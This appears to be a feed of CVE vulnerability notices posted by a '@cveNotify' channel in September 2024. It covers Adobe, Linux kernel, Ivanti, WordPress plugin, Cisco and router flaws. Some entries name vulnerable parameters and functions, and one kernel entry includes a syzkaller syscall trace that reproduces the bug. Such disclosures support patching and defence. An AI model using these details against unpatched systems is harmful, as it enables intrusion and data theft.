🚨 CVE-2024-39382After Effects versions 23.6.6, 24.5 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 09:37:26 |
🚨 CVE-2024-39380After Effects versions 23.6.6, 24.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 09:37:25 |
🚨 CVE-2024-41856Illustrator versions 28.5, 27.9.4, 28.6, 27.9.5 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 09:37:24 |
🚨 CVE-2024-39420Acrobat Reader versions 20.005.30636, 24.002.21005, 24.001.30159, 20.005.30655, 24.002.20965, 24.002.20964, 24.001.30123, 24.003.20054 and earlier are affected by a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability that could lead to arbitrary code execution. This vulnerability arises when the timing of actions changes the state of a resource between the checking of a condition and the use of the resource, allowing an attacker to manipulate the resource in a harmful way. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 07:37:32 |
🚨 CVE-2024-41872Media Encoder versions 24.5, 23.6.8 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 07:37:26 |
🚨 CVE-2024-41871Media Encoder versions 24.5, 23.6.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-13 07:37:25 |
🚨 CVE-2024-7939A stored Cross-site Scripting (XSS) vulnerability affecting 3DSwym in 3DSwymer on Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session.🎖@cveNotify |
|
| 2024-09-13 07:37:24 |
🚨 CVE-2024-7932A stored Cross-site Scripting (XSS) vulnerability affecting 3DDashboard in 3DSwymer on Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session.🎖@cveNotify |
|
| 2024-09-13 06:37:34 |
🚨 CVE-2024-46677In the Linux kernel, the following vulnerability has been resolved:gtp: fix a potential NULL pointer dereferenceWhen sockfd_lookup() fails, gtp_encap_enable_socket() returns aNULL pointer, but its callers only check for error pointers thus missthe NULL pointer case.Fix it by returning an error pointer with the error code carried fromsockfd_lookup().(I found this bug during code inspection.)🎖@cveNotify |
|
| 2024-09-13 06:37:26 |
🚨 CVE-2024-46676In the Linux kernel, the following vulnerability has been resolved:nfc: pn533: Add poll mod list filling checkIn case of im_protocols value is 1 and tm_protocols value is 0 thiscombination successfully passes the check'if (!im_protocols && !tm_protocols)' in the nfc_start_poll().But then after pn533_poll_create_mod_list() call in pn533_start_poll()poll mod list will remain empty and dev->poll_mod_count will remain 0which lead to division by zero.Normally no im protocol has value 1 in the mask, so this combination isnot expected by driver. But these protocol values actually come fromuserspace via Netlink interface (NFC_CMD_START_POLL operation). So abroken or malicious program may pass a message containing a "bad"combination of protocol parameter values so that dev->poll_mod_countis not incremented inside pn533_poll_create_mod_list(), thus leadingto division by zero.Call trace looks like:nfc_genl_start_poll() nfc_start_poll() ->start_poll() pn533_start_poll()Add poll mod list filling check.Found by Linux Verification Center (linuxtesting.org) with SVACE.🎖@cveNotify |
|
| 2024-09-13 06:37:25 |
🚨 CVE-2024-46673In the Linux kernel, the following vulnerability has been resolved:scsi: aacraid: Fix double-free on probe failureaac_probe_one() calls hardware-specific init functions through theaac_driver_ident::init pointer, all of which eventually call down toaac_init_adapter().If aac_init_adapter() fails after allocating memory for aac_dev::queues,it frees the memory but does not clear that member.After the hardware-specific init function returns an error,aac_probe_one() goes down an error path that frees the memory pointed toby aac_dev::queues, resulting.in a double-free.🎖@cveNotify |
|
| 2024-09-13 06:37:24 |
🚨 CVE-2024-38816Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.Specifically, an application is vulnerable when both of the following are true: * the web application uses RouterFunctions to serve static resources * resource handling is explicitly configured with a FileSystemResource locationHowever, malicious requests are blocked and rejected when any of the following is true: * the Spring Security HTTP Firewall https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html is in use * the application runs on Tomcat or Jetty🎖@cveNotify |
|
| 2024-09-13 04:37:24 |
🚨 CVE-2024-8656The WPFactory Helper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-13 02:37:24 |
🚨 CVE-2024-43180IBM Concert 1.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic.🎖@cveNotify |
|
| 2024-09-13 01:37:57 |
🚨 CVE-2024-31336In PVRSRVBridgeRGXKickTA3D2 of server_rgxta3d_bridge.c, there is a possible arbitrary code execution due to improper input validation. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-12 22:37:32 |
🚨 CVE-2024-32846An unspecified SQL injection in Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 22:37:25 |
🚨 CVE-2024-32840An unspecified SQL injection in Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 22:37:24 |
🚨 CVE-2024-29847Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 22:07:32 |
🚨 CVE-2024-8441An uncontrolled search path in the agent of Ivanti EPM before 2022 SU6, or the 2024 September update allows a local authenticated attacker with admin privileges to escalate their privileges to SYSTEM.🎖@cveNotify |
|
| 2024-09-12 22:07:26 |
🚨 CVE-2024-8322Weak authentication in Patch Management of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote authenticated attacker to access restricted functionality.🎖@cveNotify |
|
| 2024-09-12 22:07:25 |
🚨 CVE-2024-8191SQL injection in the management console of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 22:07:24 |
🚨 CVE-2024-6121An out-of-date version of Redis shipped with NI SystemLink Server is susceptible to multiple vulnerabilities, including CVE-2022-24834. This affects NI SystemLink Server 2024 Q1 and prior versions. It also affects NI FlexLogger 2023 Q2 and prior versions which installed this shared service.🎖@cveNotify |
|
| 2024-09-12 21:37:32 |
🚨 CVE-2024-41143Origin validation error vulnerability exists in SKYSEA Client View Ver.3.013.00 to Ver.19.210.04e. If this vulnerability is exploited, an arbitrary process may be executed with SYSTEM privilege by a user who can log in to the PC where the product's Windows client is installed.🎖@cveNotify |
|
| 2024-09-12 21:37:26 |
🚨 CVE-2023-30131An issue discovered in IXP EasyInstall 6.6.14884.0 allows attackers to run arbitrary commands, gain escalated privilege, and cause other unspecified impacts via unauthenticated API calls.🎖@cveNotify |
|
| 2024-09-12 21:37:25 |
🚨 CVE-2023-27793An issue discovered in IXP Data Easy Install v.6.6.14884.0 allows local attackers to gain escalated privileges via weak encoding of sensitive information.🎖@cveNotify |
|
| 2024-09-12 21:37:24 |
🚨 CVE-2023-46227Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can use \t to bypass. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/8814🎖@cveNotify |
|
| 2024-09-12 21:07:26 |
🚨 CVE-2024-45189Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Git Content" request🎖@cveNotify |
|
| 2024-09-12 21:07:25 |
🚨 CVE-2024-36446The provisioning manager component of Mitel MiVoice MX-ONE through 7.6 SP1 could allow an authenticated attacker to conduct an authentication bypass attack due to improper access control. A successful exploit could allow an attacker to bypass the authorization schema.🎖@cveNotify |
|
| 2024-09-12 21:07:24 |
🚨 CVE-2024-21171Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.37 and prior and 8.4.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-09-12 20:07:24 |
🚨 CVE-2024-45678Yubico YubiKey 5 Series devices with firmware before 5.7.0 and YubiHSM 2 devices with firmware before 2.4.0 allow an ECDSA secret-key extraction attack (that requires physical access and expensive equipment) in which an electromagnetic side channel is present because of a non-constant-time modular inversion for the Extended Euclidean Algorithm, aka the EUCLEAK issue. Other uses of an Infineon cryptographic library may also be affected.🎖@cveNotify |
|
| 2024-09-12 19:37:42 |
🚨 CVE-2024-34335ORDAT FOSS-Online before version 2.24.01 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login page.🎖@cveNotify |
|
| 2024-09-12 19:37:41 |
🚨 CVE-2024-25270An issue in Mirapolis LMS 4.6.XX allows authenticated users to exploit an Insecure Direct Object Reference (IDOR) vulnerability by manipulating the ID parameter and increment STEP parameter, leading to the exposure of sensitive user data.🎖@cveNotify |
|
| 2024-09-12 19:37:37 |
🚨 CVE-2024-7766The Adicon Server WordPress plugin through 1.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks🎖@cveNotify |
|
| 2024-09-12 19:37:36 |
🚨 CVE-2024-6018The Music Request Manager WordPress plugin through 1.3 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers🎖@cveNotify |
|
| 2024-09-12 19:37:32 |
🚨 CVE-2024-45450Permission control vulnerability in the software update module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-12 19:37:31 |
🚨 CVE-2024-39283Incomplete filtering of special elements in Intel(R) TDX module software before version TDX_1.5.01.00.592 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 19:37:30 |
🚨 CVE-2023-52325A local file inclusion vulnerability in one of Trend Micro Apex Central's widgets could allow a remote attacker to execute arbitrary code on affected installations.Please note: this vulnerability must be used in conjunction with another one to exploit an affected system. In addition, an attacker must first obtain a valid set of credentials on target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-09-12 19:37:27 |
🚨 CVE-2024-23744An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.🎖@cveNotify |
|
| 2024-09-12 19:37:26 |
🚨 CVE-2023-46033D-Link (Non-US) DSL-2750U N300 ADSL2+ and (Non-US) DSL-2730U N150 ADSL2+ are vulnerable to Incorrect Access Control. The UART/Serial interface on the PCB, provides log output and a root terminal without proper access control.🎖@cveNotify |
|
| 2024-09-12 19:37:25 |
🚨 CVE-2023-46042An issue in GetSimpleCMS v.3.4.0a allows a remote attacker to execute arbitrary code via a crafted payload to the phpinfo().🎖@cveNotify |
|
| 2024-09-12 19:07:31 |
🚨 CVE-2024-34163Improper input validation in firmware for some Intel(R) NUC may allow a privileged user to potentially enableescalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 19:07:30 |
🚨 CVE-2024-29015Uncontrolled search path in some Intel(R) VTune(TM) Profiler software before versions 2024.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 19:07:27 |
🚨 CVE-2024-28947Improper input validation in kernel mode driver for some Intel(R) Server Board S2600ST Family firmware before version 02.01.0017 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 19:07:26 |
🚨 CVE-2024-28887Uncontrolled search path in some Intel(R) IPP software before version 2021.11 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 19:07:25 |
🚨 CVE-2024-23908Insecure inherited permissions in some Flexlm License Daemons for Intel(R) FPGA software before version v11.19.5.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 18:37:42 |
🚨 CVE-2021-22518A vulnerability identified in OpenText™ Identity Manager AzureAD Driver that allows logging of sensitive information into log file. This impacts all versions before 5.1.4.0🎖@cveNotify |
|
| 2024-09-12 18:37:41 |
🚨 CVE-2024-6017The Music Request Manager WordPress plugin through 1.3 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-09-12 18:37:37 |
🚨 CVE-2024-8113Stored XSS in organizer and event settings of pretix up to 2024.7.0 allows malicious event organizers to inject HTML tags into e-mail previews on settings page. The default Content Security Policy of pretix prevents execution of attacker-provided scripts, making exploitation unlikely. However, combined with a CSP bypass (which is not currently known) the vulnerability could be used to impersonate other organizers or staff users.🎖@cveNotify |
|
| 2024-09-12 18:37:36 |
🚨 CVE-2024-43791RequestStore provides per-request global storage for Rack. The files published as part of request_store 1.3.2 have 0666 permissions, meaning that they are world-writable, which allows local users to execute arbitrary code. This version was published in 2017, and most production environments do not allow access for local users, so the chances of this being exploited are very low, given that the vast majority of users will have upgraded, and those that have not, if any, are not likely to be exposed.🎖@cveNotify |
|
| 2024-09-12 18:37:32 |
🚨 CVE-2024-43826In the Linux kernel, the following vulnerability has been resolved:nfs: pass explicit offset/count to trace eventsnfs_folio_length is unsafe to use without having the folio locked and acheck for a NULL ->f_mapping that protects against truncations and canlead to kernel crashes. E.g. when running xfstests generic/065 withall nfs trace points enabled.Follow the model of the XFS trace points and pass in an explіcit offsetand length. This has the additional benefit that these values canbe more accurate as some of the users touch partial folio ranges.🎖@cveNotify |
|
| 2024-09-12 18:37:31 |
🚨 CVE-2024-23497Out-of-bounds write in Linux kernel mode driver for some Intel(R) Ethernet Network Controllers and Adapters before version 28.3 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-09-12 17:37:33 |
🚨 CVE-2018-1000036In Artifex MuPDF 1.12.0 and earlier, multiple memory leaks in the PDF parser allow an attacker to cause a denial of service (memory leak) via a crafted file.🎖@cveNotify |
|
| 2024-09-12 17:37:26 |
🚨 CVE-2018-5686In MuPDF 1.12.0, there is an infinite loop vulnerability and application hang in the pdf_parse_array function (pdf/pdf-parse.c) because EOF is not considered. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted pdf file.🎖@cveNotify |
|
| 2024-09-12 17:37:25 |
🚨 CVE-2016-10246Buffer overflow in the main function in jstest_main.c in Mujstest in Artifex Software, Inc. MuPDF before 1.10 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted file.🎖@cveNotify |
|
| 2024-09-12 17:07:35 |
🚨 CVE-2024-8412A vulnerability, which was classified as problematic, was found in LinuxOSsk Shakal-NG up to 1.3.3. Affected is an unknown function of the file comments/views.py. The manipulation of the argument next leads to open redirect. It is possible to launch the attack remotely. The name of the patch is ebd1c2cba59cbac198bf2fd5a10565994d4f02cb. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-09-12 17:07:31 |
🚨 CVE-2021-4442In the Linux kernel, the following vulnerability has been resolved:tcp: add sanity tests to TCP_QUEUE_SEQQingyu Li reported a syzkaller bug where the reprochanges RCV SEQ _after_ restoring data in the receive queue.mprotect(0x4aa000, 12288, PROT_READ) = 0mmap(0x1ffff000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x1ffff000mmap(0x20000000, 16777216, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x20000000mmap(0x21000000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x21000000socket(AF_INET6, SOCK_STREAM, IPPROTO_IP) = 3setsockopt(3, SOL_TCP, TCP_REPAIR, [1], 4) = 0connect(3, {sa_family=AF_INET6, sin6_port=htons(0), sin6_flowinfo=htonl(0), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_scope_id=0}, 28) = 0setsockopt(3, SOL_TCP, TCP_REPAIR_QUEUE, [1], 4) = 0sendmsg(3, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="0x0000000000000003\0\0", iov_len=20}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 20setsockopt(3, SOL_TCP, TCP_REPAIR, [0], 4) = 0setsockopt(3, SOL_TCP, TCP_QUEUE_SEQ, [128], 4) = 0recvfrom(3, NULL, 20, 0, NULL, NULL) = -1 ECONNRESET (Connection reset by peer)syslog shows:[ 111.205099] TCP recvmsg seq # bug 2: copied 80, seq 0, rcvnxt 80, fl 0[ 111.207894] WARNING: CPU: 1 PID: 356 at net/ipv4/tcp.c:2343 tcp_recvmsg_locked+0x90e/0x29a0This should not be allowed. TCP_QUEUE_SEQ should only be usedwhen queues are empty.This patch fixes this case, and the tx path as well.🎖@cveNotify |
|
| 2024-09-12 17:07:30 |
🚨 CVE-2024-6311The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'af2_add_font' function in all versions up to, and including, 3.7.3.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-09-12 17:07:26 |
🚨 CVE-2024-43264Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Mediavine Create by Mediavine.This issue affects Create by Mediavine: from n/a through 1.9.8.🎖@cveNotify |
|
| 2024-09-12 17:07:25 |
🚨 CVE-2024-3986The SportsPress WordPress plugin before 2.7.22 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-09-12 17:07:24 |
🚨 CVE-2024-4081A memory corruption issue due to an improper length check in NI LabVIEW may disclose information or result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects NI LabVIEW 2024 Q1 and prior versions.🎖@cveNotify |
|
| 2024-09-12 16:37:43 |
🚨 CVE-2024-42760SQL Injection vulnerability in Ellevo v.6.2.0.38160 allows a remote attacker to obtain sensitive information via the /api/mob/instrucao/conta/destinatarios component.🎖@cveNotify |
|
| 2024-09-12 16:37:42 |
🚨 CVE-2024-44837A cross-site scripting (XSS) vulnerability in the component \bean\Manager.java of Drug v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user parameter.🎖@cveNotify |
|
| 2024-09-12 16:37:38 |
🚨 CVE-2024-45440core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.🎖@cveNotify |
|
| 2024-09-12 16:37:37 |
🚨 CVE-2021-38121Insufficient or weak TLS protocol version identified in Advance authentication client server communication when specific service is accessed between devices. This issue affects NetIQ Advance Authentication versions before 6.3.5.1🎖@cveNotify |
|
| 2024-09-12 16:07:58 |
🚨 CVE-2024-6450HyperView Geoportal Toolkit in versions lower than 8.5.0 is vulnerable to Reflected Cross-Site Scripting (XSS). An unauthenticated attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser.🎖@cveNotify |
|
| 2024-09-12 16:07:57 |
🚨 CVE-2023-52907In the Linux kernel, the following vulnerability has been resolved:nfc: pn533: Wait for out_urb's completion in pn533_usb_send_frame()Fix a use-after-free that occurs in hcd when in_urb sent frompn533_usb_send_frame() is completed earlier than out_urb. Its callbackfrees the skb data in pn533_send_async_complete() that is used as atransfer buffer of out_urb. Wait before sending in_urb until thecallback of out_urb is called. To modify the callback of out_urb alone,separate the complete function of out_urb and ack_urb.Found by a modified version of syzkaller.BUG: KASAN: use-after-free in dummy_timerCall Trace: memcpy (mm/kasan/shadow.c:65) dummy_perform_transfer (drivers/usb/gadget/udc/dummy_hcd.c:1352) transfer (drivers/usb/gadget/udc/dummy_hcd.c:1453) dummy_timer (drivers/usb/gadget/udc/dummy_hcd.c:1972) arch_static_branch (arch/x86/include/asm/jump_label.h:27) static_key_false (include/linux/jump_label.h:207) timer_expire_exit (include/trace/events/timer.h:127) call_timer_fn (kernel/time/timer.c:1475) expire_timers (kernel/time/timer.c:1519) __run_timers (kernel/time/timer.c:1790) run_timer_softirq (kernel/time/timer.c:1803)🎖@cveNotify |
|
| 2024-09-12 16:07:56 |
🚨 CVE-2022-38382IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.11.0 and IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 does not invalidate session after logout which could allow another user to obtain sensitive information. IBM X-Force ID: 233672.🎖@cveNotify |
|
| 2024-09-12 16:07:51 |
🚨 CVE-2024-42468openHAB, a provider of open-source home automation software, has add-ons including the visualization add-on CometVisu. CometVisuServlet in versions prior to 4.2.1 is susceptible to an unauthenticated path traversal vulnerability. Local files on the server can be requested via HTTP GET on the CometVisuServlet. This issue may lead to information disclosure. Users should upgrade to version 4.2.1 of the CometVisu add-on of openHAB to receive a patch.🎖@cveNotify |
|
| 2024-09-12 16:07:50 |
🚨 CVE-2024-34128Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-09-12 15:37:48 |
🚨 CVE-1999-0038Buffer overflow in xlock program allows local users to execute commands as root.🎖@cveNotify |
|
| 2024-09-12 15:07:50 |
🚨 CVE-2023-52909In the Linux kernel, the following vulnerability has been resolved:nfsd: fix handling of cached open files in nfsd4_open codepathCommit fb70bf124b05 ("NFSD: Instantiate a struct file when creating aregular NFSv4 file") added the ability to cache an open fd over acompound. There are a couple of problems with the way this currentlyworks:It's racy, as a newly-created nfsd_file can end up with its PENDING bitcleared while the nf is hashed, and the nf_file pointer is still zeroedout. Other tasks can find it in this state and they expect to see avalid nf_file, and can oops if nf_file is NULL.Also, there is no guarantee that we'll end up creating a new nfsd_fileif one is already in the hash. If an extant entry is in the hash with avalid nf_file, nfs4_get_vfs_file will clobber its nf_file pointer withthe value of op_file and the old nf_file will leak.Fix both issues by making a new nfsd_file_acquirei_opened variant thattakes an optional file pointer. If one is present when this is called,we'll take a new reference to it instead of trying to open the file. Ifthe nfsd_file already has a valid nf_file, we'll just ignore theoptional file and pass the nfsd_file back as-is.Also rework the tracepoints a bit to allow for an "opened" variant anddon't try to avoid counting acquisitions in the case where we alreadyhave a cached open file.🎖@cveNotify |
|
| 2024-09-12 15:07:49 |
🚨 CVE-2024-21302Summary:Microsoft was notified that an elevation of privilege vulnerability exists in Windows based systems supporting Virtualization Based Security (VBS), including a subset of Azure Virtual Machine SKUS. This vulnerability enables an attacker with administrator privileges to replace current versions of Windows system files with outdated versions. By exploiting this vulnerability, an attacker could reintroduce previously mitigated vulnerabilities, circumvent some features of VBS, and exfiltrate data protected by VBS.Microsoft is developing a security update to mitigate this threat, but it is not yet available. Guidance to help customers reduce the risks associated with this vulnerability and to protect their systems until the mitigation is available in a Windows security update is provided in the Recommended Actions section of this CVE.This CVE will be updated when the mitigation is available in a Windows security update. We highly encourage customers to subscribe to Security Update Guide notifications to receive an alert when this update occurs.Update: August 13, 2024Microsoft has released the August 2024 security updates that include an opt-in revocation policy mitigation to address this vulnerability. Customers running affected versions of Windows are encouraged to review KB5042562: Guidance for blocking rollback of virtualization-based security related updates to assess if this opt-in policy meets the needs of their environment before implementing this mitigation. There are risks associated with this mitigation that should be understood prior to applying it to your systems. Detailed information about these risks is also available in KB5042562.Details:A security researcher informed Microsoft of an elevation of privilege vulnerability in Windows 10, Windows 11, Windows Server 2016, and higher based systems including Azure Virtual Machines (VM) that support VBS. For more information on Windows versions and VM SKUs supporting VBS, reference: Virtualization-based Security (VBS) | Microsoft Learn.The vulnerability enables an attacker with administrator privileges on the target system to replace current Windows system files with outdated versions. Successful exploitation provides an attacker with the ability to reintroduce previously mitigated vulnerabilities, circumvent VBS security features, and exfiltrate data protected by VBS.Microsoft is developing a security update that will revoke outdated, unpatched VBS system files to mitigate this...🎖@cveNotify |
|
| 2024-09-12 14:38:11 |
🚨 CVE-2023-37831An issue discovered in Elenos ETG150 FM transmitter v3.12 allows attackers to enumerate user accounts based on server responses when credentials are submitted.🎖@cveNotify |
|
| 2024-09-12 14:38:10 |
🚨 CVE-2023-5739Certain versions of HP PC Hardware Diagnostics Windows are potentially vulnerable to elevation of privilege.🎖@cveNotify |
|
| 2024-09-12 14:07:34 |
🚨 CVE-2024-42376SAP Shared Service Framework does not perform necessaryauthorization check for an authenticated user, resulting in escalation ofprivileges. On successful exploitation, an attacker can cause a high impact onconfidentiality of the application.🎖@cveNotify |
|
| 2024-09-12 14:07:33 |
🚨 CVE-2024-42375SAP BusinessObjects Business Intelligence Platform allows an authenticated attacker to upload malicious code over the network, that could be executed by the application. On successful exploitation, the attacker can cause a low impact on the Integrity of the application.🎖@cveNotify |
|
| 2024-09-12 14:07:29 |
🚨 CVE-2024-41736Under certain conditions SAP Permit to Workallows an authenticated attacker to access information which would otherwise berestricted causing low impact on the confidentiality of the application.🎖@cveNotify |
|
| 2024-09-12 14:07:28 |
🚨 CVE-2024-41730In SAP BusinessObjects Business IntelligencePlatform, if Single Signed On is enabled on Enterprise authentication, anunauthorized user can get a logon token using a REST endpoint. The attacker canfully compromise the system resulting in High impact on confidentiality,integrity and availability.🎖@cveNotify |
|
| 2024-09-12 13:38:09 |
🚨 CVE-2023-45984TOTOLINK X5000R V9.1.0u.6118_B20201102 and TOTOLINK A7000R V9.1.0u.6115_B20201022 was discovered to contain a stack overflow via the lang parameter in the function setLanguageCfg.🎖@cveNotify |
|
| 2024-09-12 13:38:03 |
🚨 CVE-2023-36950TOTOLINK X5000R V9.1.0u.6118_B20201102 and TOTOLINK A7000R V9.1.0u.6115_B20201022 was discovered to contain a stack overflow via the http_host parameter in the function loginAuth.🎖@cveNotify |
|
| 2024-09-12 13:38:02 |
🚨 CVE-2022-27004Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.🎖@cveNotify |
|
| 2024-09-12 13:38:01 |
🚨 CVE-2022-27003Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6rd function via the relay6rd parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.🎖@cveNotify |
|
| 2024-09-12 12:37:43 |
🚨 CVE-2024-20489A vulnerability in the storage method of the PON Controller configuration file could allow an authenticated, local attacker with low privileges to obtain the MongoDB credentials.This vulnerability is due to improper storage of the unencrypted database credentials on the device that is running Cisco IOS XR Software. An attacker could exploit this vulnerability by accessing the configuration files on an affected system. A successful exploit could allow the attacker to view MongoDB credentials.🎖@cveNotify |
|
| 2024-09-12 12:37:42 |
🚨 CVE-2024-20398A vulnerability in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to obtain read/write file system access on the underlying operating system of an affected device.This vulnerability is due to insufficient validation of user arguments that are passed to specific CLI commands. An attacker with a low-privileged account could exploit this vulnerability by using crafted commands at the prompt. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2024-09-12 12:37:38 |
🚨 CVE-2024-20390A vulnerability in the Dedicated XML Agent feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) on XML TCP listen port 38751.This vulnerability is due to a lack of proper error validation of ingress XML packets. An attacker could exploit this vulnerability by sending a sustained, crafted stream of XML traffic to a targeted device. A successful exploit could allow the attacker to cause XML TCP port 38751 to become unreachable while the attack traffic persists.🎖@cveNotify |
|
| 2024-09-12 12:37:37 |
🚨 CVE-2024-20317A vulnerability in the handling of specific Ethernet frames by Cisco IOS XR Software for various Cisco Network Convergence System (NCS) platforms could allow an unauthenticated, adjacent attacker to cause critical priority packets to be dropped, resulting in a denial of service (DoS) condition.This vulnerability is due to incorrect classification of certain types of Ethernet frames that are received on an interface. An attacker could exploit this vulnerability by sending specific types of Ethernet frames to or through the affected device. A successful exploit could allow the attacker to cause control plane protocol relationships to fail, resulting in a DoS condition. For more information, see the section of this advisory.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.🎖@cveNotify |
|
| 2024-09-12 12:37:36 |
